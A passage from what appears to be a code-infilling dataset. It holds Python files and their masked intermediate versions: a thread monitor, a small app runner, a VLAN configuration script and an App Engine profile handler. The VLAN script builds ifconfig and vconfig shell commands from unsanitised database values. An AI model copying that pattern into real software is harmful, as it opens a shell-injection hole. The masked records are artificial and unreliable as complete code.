event_loop, send_exit\n m = Monitor()\n event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))\n event_loop_thread.start()\n m.list_append(5)\n time.sleep(1)\n m.list_print()\n send_exit()\n event_loop_thread.join()\n",
"step-5": "import inspect\nimport threading\n\nfrom monitor.mutex import Mutex, mutex_hooks\nfrom monitor.condition import Condition, condition_hooks\nfrom monitor.shared_variables import SharedList, SharedDict, shared_auto, \\\n variable_hooks\n\nhooks = {}\nfor h in [mutex_hooks, condition_hooks, variable_hooks]:\n hooks.update(h)\n\ndef method_decorator(method):\n def wrapped(self, *args, **kwargs):\n # print(self, *args, **kwargs)\n self._mutex.acquire()\n for var in self._variables:\n var.apply_pending_changes()\n value = method(self, *args, **kwargs)\n for var in self._variables:\n var.sync()\n self._mutex.release()\n return value\n return wrapped\n\nclass MonitorMeta(type):\n def __init__(cls, name, bases, attrs):\n super(MonitorMeta, cls).__init__(name, bases, attrs)\n for name, method in inspect.getmembers(cls, predicate=inspect.isfunction):\n if name not in ['wait', 'signal', 'register', 'shared',\n 'condition', '__init__', '__new__']:\n setattr(cls, name, method_decorator(method))\n\nclass ConditionWrapper:\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n\n def wait(self):\n for var in self.monitor._variables:\n var.sync()\n self.condition.wait()\n for var in self.monitor._variables:\n var.apply_pending_changes()\n\n def signal(self):\n self.condition.signal()\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.__class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.__class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\nclass Monitor(MonitorBase):\n def __init__(self):\n # self.s1 = SharedList('s1', [1,2,3])\n # self.register([self.s1])\n self.s1 = self.shared([1,2,3])\n self.c = self.condition()\n\n def test(self):\n self.wait(\"aaa\")\n print(\"test\")\n self.signal(\"aaa\")\n return 1\n\n def abc(self):\n print(\"abc\")\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\nif __name__ == '__main__':\n import time\n\n from monitor.main import event_loop, send_exit\n\n m = Monitor()\n\n event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))\n event_loop_thread.start()\n\n # print(m._mutex)\n # while True:\n # m.seq()\n m.list_append(5)\n time.sleep(1)\n m.list_print()\n\n send_exit()\n event_loop_thread.join()\n",
"step-ids": [
16,
17,
18,
23,
26
]
}
|
[
16,
17,
18,
23,
26
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
app.run(host='0.0.0.0', port=5001)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
app.run(host='0.0.0.0', port=5001)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from app.api import app
def main():
app.run(host='0.0.0.0', port=5001)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "b49e5b40ce1e16f1b7c0bd9509daf94f36c51256",
"index": 6726,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from app.api import app\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
<|reserved_special_token_0|>
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
if __name__ == '__main__':
VlanConfig()
<|reserved_special_token_1|>
import MySQLdb
import os
import commands
from common import logger_init
from logging import getLogger
import re
from db import VlanInfo, Session, WafBridge
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
if __name__ == '__main__':
VlanConfig()
<|reserved_special_token_1|>
#! /usr/bin/env python
# -*- conding:utf-8 -*-
import MySQLdb
import os
import commands
from common import logger_init
from logging import getLogger
import re
from db import VlanInfo,Session,WafBridge
def getVlan(): # get vlan data from t_vlan
session=Session()
vlanport=[]
for info in session.query(VlanInfo):
a=[]
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface=[]
for i in range(len(vlanport)):
nic=vlanport[i]
a=nic[0].split(',')
interface.append( a[0]+'.'+nic[1])
interface.append(a[1]+'.'+nic[1])
return interface
def getBridgeInfo(): #get data from t_bridge
session=Session()
brgport=[]
for info in session.query(WafBridge.nics):
info=list(tuple(info))
info=''.join(info)
brgport.append(info)
brgport=' '.join(brgport)
return brgport
def getSysInterface(): #Gets the configured interface
info=os.popen('ifconfig').read()
f=open('ifconfig_info.txt','w')
print >>f,info
f.close()
match=re.compile(r'(.+?)\s*?Link')
f=open('ifconfig_info.txt','r')
interface=[]
for line in f:
if 'Link encap' in line:
info=match.match(line).groups()
interface.append(info)
f.close()
b=[]
for i in range(len(interface)):
a=list(tuple(interface[i]))
a=''.join(a)
b.append(a)
strinfo=' '.join(b)
listinfo=strinfo.split()
port=[]
nic=[]
for i in range(len(listinfo)):
if '.'in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port=[]
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig(): #config vlan(add and delete)
logger_init('main','log/vlanconfig.log','INFO')
config_interface=getVlan()
configured_port=getSysInterface()
vlan_port=' '.join(configured_port[0])
configured_nic=' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a=config_interface[i].split('.')
if a[0] not in configured_nic:
(status,output)=commands.getstatusoutput('ifconfig %s up'%a[0])
if status!=0:
return
(status,output)=commands.getstatusoutput('vconfig add %s %s'%(a[0],a[1]))
getLogger('main').info(output)
(status,output)=commands.getstatusoutput('ifconfig %s up'%config_interface[i])
if status==0:
getLogger('main').info('ifconfig %s up OK'%config_interface[i])
config_interface=' '.join(config_interface)
vlan_port=configured_port[0]
brgport=getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
(status,output)=commands.getstatusoutput('vconfig rem %s'%vlan_port[i])
if status==0:
getLogger('main').info('vconfig rem %s ok'%vlan_port[i])
if __name__=='__main__':
VlanConfig()
# getVlan()
# getSysInterface()
# getBridgeInfo()
|
flexible
|
{
"blob_id": "cd564ebb51cf91993d2ed1810707aead44c19a6b",
"index": 6959,
"step-1": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\n<mask token>\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\nif __name__ == '__main__':\n VlanConfig()\n",
"step-4": "import MySQLdb\nimport os\nimport commands\nfrom common import logger_init\nfrom logging import getLogger\nimport re\nfrom db import VlanInfo, Session, WafBridge\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\nif __name__ == '__main__':\n VlanConfig()\n",
"step-5": "#! /usr/bin/env python\n# -*- conding:utf-8 -*-\nimport MySQLdb\nimport os\nimport commands\nfrom common import logger_init\nfrom logging import getLogger\nimport re\nfrom db import VlanInfo,Session,WafBridge\n\n\ndef getVlan(): # get vlan data from t_vlan\n session=Session()\n vlanport=[]\n for info in session.query(VlanInfo):\n a=[]\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface=[]\n for i in range(len(vlanport)):\n nic=vlanport[i]\n a=nic[0].split(',')\n interface.append( a[0]+'.'+nic[1])\n interface.append(a[1]+'.'+nic[1])\n return interface\n\ndef getBridgeInfo(): #get data from t_bridge\n session=Session()\n brgport=[]\n for info in session.query(WafBridge.nics):\n info=list(tuple(info))\n info=''.join(info)\n brgport.append(info)\n brgport=' '.join(brgport)\n return brgport\n\n\ndef getSysInterface(): #Gets the configured interface\n info=os.popen('ifconfig').read()\n f=open('ifconfig_info.txt','w')\n print >>f,info\n f.close()\n match=re.compile(r'(.+?)\\s*?Link')\n f=open('ifconfig_info.txt','r')\n interface=[]\n for line in f:\n if 'Link encap' in line:\n info=match.match(line).groups()\n interface.append(info)\n f.close()\n b=[]\n for i in range(len(interface)):\n a=list(tuple(interface[i]))\n a=''.join(a)\n b.append(a)\n strinfo=' '.join(b)\n listinfo=strinfo.split()\n port=[]\n nic=[]\n for i in range(len(listinfo)):\n if '.'in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port=[]\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\n\ndef VlanConfig(): #config vlan(add and delete)\n logger_init('main','log/vlanconfig.log','INFO')\n config_interface=getVlan()\n configured_port=getSysInterface()\n vlan_port=' '.join(configured_port[0])\n configured_nic=' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a=config_interface[i].split('.')\n if a[0] not in configured_nic:\n (status,output)=commands.getstatusoutput('ifconfig %s up'%a[0])\n if status!=0:\n return\n (status,output)=commands.getstatusoutput('vconfig add %s %s'%(a[0],a[1]))\n getLogger('main').info(output)\n (status,output)=commands.getstatusoutput('ifconfig %s up'%config_interface[i])\n if status==0:\n getLogger('main').info('ifconfig %s up OK'%config_interface[i])\n config_interface=' '.join(config_interface)\n vlan_port=configured_port[0]\n brgport=getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n (status,output)=commands.getstatusoutput('vconfig rem %s'%vlan_port[i])\n if status==0:\n getLogger('main').info('vconfig rem %s ok'%vlan_port[i])\n\n\nif __name__=='__main__':\n VlanConfig()\n# getVlan()\n# getSysInterface()\n# getBridgeInfo()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
import os
import logging
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class UserProfile(ndb.Model):
"""Models the profile (JSON) of an individual user."""
profile = ndb.TextProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def query_profile(cls, ancestor_key):
return cls.query(ancestor=ancestor_key).get()
class UserProfileHandler(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('templates/profile.html')
the_user = self.request.get('user')
logging.info("The user = " + the_user)
if the_user == "":
the_user = users.get_current_user().email()
owner = True
else:
owner = False
user_profile_data = UserProfile.get_by_id(the_user)
template_values = { 'owner': owner, 'user': the_user}
if user_profile_data:
template_values['profile_data'] = user_profile_data.profile
logging.info(user_profile_data)
self.response.out.write(template.render(template_values))
def post(self):
user = users.get_current_user()
profile_data = self.request.get('profile_data')
user_profile = UserProfile(id=user.email(), profile=profile_data)
user_profile.put()
self.redirect('/profile')
#self.response.out.write("Here is the JSON for your profile.")
#self.response.out.write(profile_data)
app = webapp2.WSGIApplication([
('/profile', UserProfileHandler),
], debug=True)
|
normal
|
{
"blob_id": "309090167c2218c89494ce17f7a25bd89320a202",
"index": 3855,
"step-1": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
